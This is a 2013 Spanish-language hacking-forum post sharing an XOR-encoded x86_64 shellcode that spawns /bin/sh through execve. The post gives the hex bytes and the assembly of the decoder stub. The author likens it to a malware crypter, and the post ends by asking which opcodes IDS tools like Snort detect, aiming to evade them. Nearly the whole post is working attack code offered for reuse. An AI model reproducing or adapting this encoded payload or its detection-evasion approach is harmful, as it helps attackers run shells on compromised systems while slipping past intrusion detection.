elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.

 

 


Tema destacado: Usando Git para manipular el directorio de trabajo, el índice y commits (segunda parte)


+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Hacking
| | |-+  Bugs y Exploits
| | | |-+  [!] Encode XOR /bin/sh x86_64
0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] Ir Abajo Respuesta Imprimir
Autor Tema: [!] Encode XOR /bin/sh x86_64  (Leído 2,740 veces)
xv0


Desconectado Desconectado

Mensajes: 1.027



Ver Perfil
[!] Encode XOR /bin/sh x86_64
« en: 6 Agosto 2013, 19:03 pm »

Hola

Como no hay muchos temas de estos en el foro les dejo este aporte, se trata de la tipica execve /bin/sh. No esta testeada ya que utilizo OpenBSD y no puedo ejecutar nada desde la memoria, para la Linux cambien el numero de la syscall, tendria que funcionar.

Este codigo lo cree para poner en practica mis conocimientos, si alguien da un mal uso es su problema, no soy responsable.

Código
  1. "\xeb\x0c\x5e\x46\x31\x24\x8e\x41\xfe\xc9\x75\xf7\xff\xe6"
  2. "\x41\xb1\x06\x4d\x31\xe4\x41\xff\xcc\xe8\xe6\xff\xff\xff"
  3. "\xb7\x44\xe8\x4e\xcb\x48\x68\xc6\xcb\x7f\xb7\x2e\x3c\xac"
  4. "\xab\xa0\xb7\xce\x3f\xaf\xab\xa1\xb7\x66\x4f\xc4\xf0\xfa";

Este es el Encode.

Código
  1. _start:
  2.  
  3. jmp _C.2
  4.  
  5. _C.0:
  6.  
  7. popq %rsi
  8.  
  9. _C.1:
  10.  
  11. xorl %r12d, (%rsi, %r9, 4)
  12. decb %r9b
  13. jnz _C.1
  14. jmp *%rsi
  15.  
  16. _C.2:
  17.  
  18. movb $0x6, %r9b
  19. xorq %r12, %r12
  20. decl %r12d
  21. call _C.0

Como pueden observar es casi identico por no decir que es completamente identico al de un crypter de un troyano o malware similar. Tengo bastantes ideas de como mejorar el cifrado, si alguien se anima que lo comente, y cualquier pregunta sobre el codigo ya saben.

Un saludo.

P.D: Alguien sabe cuales son los opcodes que detecta un IDS? Por ejemplo se que Snort detecta los NOP y /bin/sh.
« Última modificación: 6 Agosto 2013, 19:10 pm por cpu2 » En línea

Páginas: [1] Ir Arriba Respuesta Imprimir 

Ir a:  

Mensajes similares
Asunto Iniciado por Respuestas Vistas Último mensaje
Problemas con el Encode.ASCII
Programación Visual Basic
CsarGR 0 1,356 Último mensaje 6 Febrero 2006, 12:21 pm
por CsarGR
error for wireless request set encode 8b2a
Hacking Wireless
Mr.Shak 0 2,806 Último mensaje 31 Octubre 2011, 16:25 pm
por Mr.Shak
Xplico en kali x86_64
GNU/Linux
mortenol 0 1,999 Último mensaje 2 Julio 2013, 00:45 am
por mortenol
XSS con Double URL Encode
Nivel Web
MichBukana 0 2,077 Último mensaje 27 Junio 2014, 14:16 pm
por MichBukana
[Consulta] DNS Spoofing + MSF Payload + MSF Encode
Hacking
0xP01S0N 0 2,147 Último mensaje 24 Febrero 2015, 17:02 pm
por 0xP01S0N
WAP2 - Aviso Legal - Powered by SMF 1.1.21 | SMF © 2006-2008, Simple Machines